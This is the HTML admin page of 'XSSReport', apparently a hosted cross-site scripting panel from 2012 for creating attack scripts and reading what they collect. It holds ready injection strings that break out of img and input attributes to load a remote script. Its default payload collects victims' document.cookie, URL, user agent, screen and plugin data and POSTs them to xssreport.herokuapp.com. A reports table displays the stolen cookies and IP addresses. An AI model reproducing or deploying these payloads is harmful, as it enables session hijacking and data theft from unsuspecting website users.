<!DOCTYPE html>
<html>
<head>
  <script src="http://gs.ccp.li/xssreport/assets/jquery.1.8.3.min.js"></script>
  <script src="http://gs.ccp.li/xssreport/assets/bootstrap/js/bootstrap.2.2.2.min.js"></script>
  <script src="http://gs.ccp.li/xssreport/assets/codemirror.3.0/lib/codemirror.js"></script>
  <script src="http://gs.ccp.li/xssreport/assets/codemirror.3.0/lib/util/loadmode.js"></script>
  <script src="http://gs.ccp.li/xssreport/assets/codemirror.3.0/lib/util/runmode.js"></script>
  <script src="http://gs.ccp.li/xssreport/assets/codemirror.3.0/lib/util/simple-hint.js"></script>
  <script src="http://gs.ccp.li/xssreport/assets/codemirror.3.0/lib/util/javascript-hint.js"></script>
  <script src="http://gs.ccp.li/xssreport/assets/codemirror.3.0/mode/javascript/javascript.js"></script>
  <script src="http://gs.ccp.li/xssreport/assets/codemirror.3.0/mode/coffeescript/coffeescript.js"></script>
  <script src="http://gs.ccp.li/xssreport/assets/underscore.1.4.3.min.js"></script>
  <script src="http://gs.ccp.li/xssreport/assets/backbone.0.9.9.js"></script>
  <script src="http://gs.ccp.li/xssreport/assets/backbone.paginator.0.1.54.js"></script>
  <script src="http://gs.ccp.li/xssreport/assets/coffee-script.1.4.0.js"></script>
  <script src="http://gs.ccp.li/xssreport/assets/spin.1.2.7.js"></script>
  <script src="http://gs.ccp.li/xssreport/assets/jquery.spin.js"></script>
  <script src="http://gs.ccp.li/xssreport/assets/highlight.7.3.min.js"></script>
  <script src="http://gs.ccp.li/xssreport/assets/uglifyjs.1.2.5.min.js"></script>
  <script src="http://gs.ccp.li/xssreport/assets/uglifyjs.1.2.5.min.js"></script>
  <script src="http://gs.ccp.li/xssreport/assets/jquery.blockUI.2.54.js"></script>
  <script src="/static/assets/moment.1.7.2.min.js"></script>
  <link href="http://gs.ccp.li/xssreport/assets/highlightjs.default.7.3.min.css" rel="stylesheet">
  <link href="http://gs.ccp.li/xssreport/assets/bootstrap/css/bootstrap-combined.2.2.2.min.css" rel="stylesheet">
  <link href="//netdna.bootstrapcdn.com/bootswatch/2.1.1/cosmo/bootstrap.min.css" rel="stylesheet">
  <link href="http://gs.ccp.li/xssreport/assets/codemirror.3.0/lib/util/simple-hint.css" rel="stylesheet">
  <link href="http://gs.ccp.li/xssreport/assets/codemirror.3.0/lib/codemirror.css" rel="stylesheet">
  <script src="/static/manage.js"></script>
  <link href="/static/manage.css" rel="stylesheet">
</head>
<body>
  <script type="text/underscore-template" id="home-template">
    <div class="row">
      <div class="span6">
        <button class="btn btn-large show-scripts">Scripts</button>
      </div>
      <div class="span6">
        <button class="btn btn-large show-reports">Reports</button>
        <% if (typeof uris !== 'undefined') { _.each(uris, function(uri) { %>
          
        <% }); } %>
      </div>
    </div>
  </script>
  <script type="text/underscore-template" id="script-edit-template">
    <form class="form-horizontal"><fieldset>
      <div class="row"><div class="span12">
        <legend>Edit your XSS script.</legend>
        <div class="control-group">
          <label class="control-label" for="name">Name</label>
          <div class="controls">
            <input class="input-medium" id="name" type="text" value="<%- name %>" required></input>
          </div>
        </div>
        <div class="control-group">
          <label class="control-label" for="uri">URI</label>
          <div class="controls">
            <div class="input-prepend">
              <span class="add-on">http://xssreport.herokuapp.com/x/</span>
              <input class="input-small" id="uri" type="text" value="<%- uri %>" required></input>
            </div>
          </div>
        </div>
        <div class="control-group">
          <label class="control-label" for="name">Short URL</label>
          <div class="controls">
            <input class="input-medium" id="short-url" type="text" value="<%- short_url %>"></input>
            <div class="btn-group">
              <button class="btn dropdown-toggle" data-toggle="dropdown">
                Generate
                <span class="caret"></span>
              </button>
              <ul class="dropdown-menu">
                <li><a class="shorten-google" href="#">Google (goo.gl)</a></li>
              </ul>
          </div>
        </div>
      </div></div>
      <div class="row">
        <div class="span7">
          <textarea class="code-editor"></textarea>
        </div>
        <div class="span5">
          <textarea class="compiled"></textarea>
        </div>
      </div>
      <div class="row">
        <div class="span12"><div class="alert alert-error" id="error" style="display:none"></div></div>
      </div>
      <div class="row">
        <div class="span2"><a class="btn btn-primary compile">Compile</a></div>
        <div class="span2"><a class="btn compress">Compress</a></div>
        <div class="span2"><a class="btn btn-danger run">Run</a></div>
        <div class="span2"><a class="btn btn-success save">Save</a></div>
      </div>
    </fieldset></form>
  </script>
  <script type="text/underscore-template" id="scripts-list-template">
    <div class="row clearfix"><div class="span12">
      <div class="pull-right">
        <a class="btn btn-small refresh" href="#"><i class="icon-refresh"></i> Refresh</a>
        <a class="btn btn-small add-script" href="#"><i class="icon-plus"></i> Create New Script</a>
      </div>
    </div></div>
    <div class="row"><div class="span12">
      <table class="table table-hover">
        <thead>
          <tr>
            <th>#</th>
            <th>Name</th>
            <th>URI</th>
            <th>Short URL</th>
            <th>Created</th>
            <th>Last Modified</th>
            <th>Options</th>
          </tr>
        </thead>
        <tbody>
          <% _.each(items, function(item) { %>
            <tr data-id="<%- item.id %>">
              <td><%- item.id %></td>
              <td><%- item.name %></td>
              <td><%- item.uri %></td>
              <td><a href="<%- item.short_url %>"><%- item.short_url %></a></td>
              <td><%- XSSReport.formatDate(item.created) %></td>
              <td><%- XSSReport.formatDate(item.last_edited) %></td>
              <td>
                <div class="btn-group">
                  <a class="btn use-script" href="#"><i class="icon-user icon-info-sign"></i> Show Usage</a>
                  <a class="btn dropdown-toggle" data-toggle="dropdown" href="#"><span class="caret"></span></a>
                  <ul class="dropdown-menu">
                    <li><a class="edit-script" href="#"><i class="icon-pencil"></i> Edit</a></li>
                    <li><a class="remove-script" href="#"><i class="icon-trash"></i> Delete</a></li>
                    <li><a class="duplicate-script" href="#"><i class="icon-file"></i> Duplicate</a></li>
                    <li><a class="show-reports" href="#"><i class="icon-list"></i> Show Reports</a></li>
                  </ul>
                </div>
              </td>
            </tr>
          <% }); %>
        </tbody>
      </table>
      <ul class="pager">
        <li class="previous"><a href="#" class="previous-page">← Previous</a></li>
        <li class="next"><a href="#" class="next-page">Next →</a></li>
      </ul>
      <div class="modal hide fade" role="dialog"></div>
    </div></div>
  </script>
  <script type="text/underscore-template" id="new-script-template">
    <div class="modal-header">
      <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
      <h3 id="myModalLabel">Create New Script</h3>
    </div>
    <div class="modal-body">
      <div class="alert alert-error error" style="display:none"></div>
      <form class="form-horizontal"><fieldset>
        <div class="control-group">
          <label class="control-label" for="name">Name</label>
          <div class="controls">
            <input class="input-medium" id="name" type="text" value="" required></input>
          </div>
        </div>
        <div class="control-group">
          <label class="control-label" for="uri">URI</label>
          <div class="controls">
            <div class="input-prepend">
              <span class="add-on">http://xssreport.herokuapp.com/x/</span>
              <input class="input-small" id="uri" type="text" value="" required></input>
            </div>
          </div>
        </div>
        <div class="control-group">
          <pre><code class="coffeescript" id="new-script-code"></code></pre>
        </div>
      </fieldset></form>
    </div>
    <div class="modal-footer">
      <button class="btn btn-warning create-custom-script pull-left">Create Custom Script</button>
      <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>
      <button class="btn btn-primary save-new-script">Save</button>
    </div>
  </script>
  <script type="text/underscore-template" id="script-usage-template">
    <div class="modal-header">
      <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
      <h3 id="myModalLabel">Usage for &quot;<%- uri %>&quot;</h3>
    </div>
    <div class="modal-body">
      <% url = short_url || "http://xssreport.herokuapp.com/x/" + uri %>
      <h5>Standard non-filtered</h5>
      <pre><code class="html">&lt;script src=&quot;<%- url %>&quot;&gt;&lt;/script&gt;</code></pre>
      <h5>In url attribute of &lt;img&gt;</h5>
      <pre><code class="html">&quot;&gt;&lt;/img&gt;&lt;script src=&quot;<%- url %>&quot;&gt;&lt;/script&gt;&lt;img d=&quot;</code></pre>
      <h5>In value attribute of &lt;input&gt;</h5>
      <pre><code class="html">&quot;&gt;&lt;/input&gt;&lt;script src=&quot;<%- url %>&quot;&gt;&lt;/script&gt;&lt;input value=&quot;</code></pre>
    </div>
  </script>
  <script type="text/underscore-template" id="reports-list-template">
    <div class="row"><div class="span12">
      <table class="table table-hover table-condensed">
        <thead>
          <tr>
            <th>#</th>
            <th>URL</th>
            <th>Created</th>
            <th>IP</th>
            <th>Cookie</th>
            <th>UserAgent</th>
          </tr>
        </thead>
        <tbody>
          <% _.each(items, function(item) { %>
            <tr data-id="<%- item.id %>">
              <td><%- item.id %></td>
              <td><%- item.url %></td>
              <td><%- XSSReport.formatDate(item.created) %></td>
              <td><%- item.remote_ip %></a></td>
              <td><%- item.cookie %></td>
              <td><%- item.useragent %></td>
            </tr>
          <% }); %>
        </tbody>
      </table>
      <ul class="pager">
        <li class="previous"><a href="#" class="previous-page">← Previous</a></li>
        <li class="next"><a href="#" class="next-page">Next →</a></li>
      </ul>
    </div></div>
  </script>
  <script type="text/underscore-template" id="xss-general-template"># cookie
d = 'c=' + encodeURIComponent(document.cookie)
# url
d += '&u=' + encodeURIComponent(window.location.href)
# useragent 
d += '&ua=' + encodeURIComponent(navigator.userAgent)
# screen
s = ''
for k, v of screen
  s += k + ':' + v + ';'
d += '&s=' + encodeURIComponent(s)
# plugins, platform
a = 'Plugins:'
for p in navigator.plugins
  a += (p.name || '') + ', '
a += '; Platform:' + navigator.platform + ';'
d += '&a=' + encodeURIComponent(a)

xmlhttp = if window.XMLHttpRequest then new XMLHttpRequest() else new ActiveXObject("Microsoft.XMLHTTP")
xmlhttp.open("POST", (if 'https:' == document.location.protocol then 'https://' else 'http://') + "xssreport.herokuapp.com/r/<%= uri %>/",true)
xmlhttp.send(d)
  </script>
  <div class="container">
    <div class="">
      <div class="alert alert-success global-flash" style="display:none; ">
        <a class="close">×</a>
        <strong>Success</strong>
      </div>
      <div class="app" style="min-height: 400px;">
      </div>
      <div class="row footer"><div class="span12">
        <div class="muted" align="middle">
          <p>Copyright © 2012 Changping Chen, All Rights Reserved</p>
        </div>
      </div></div>
    </div>
  </div>
  <div id="center" style="position:fixed;top:50%;left:50%"></div>
</body>
</html>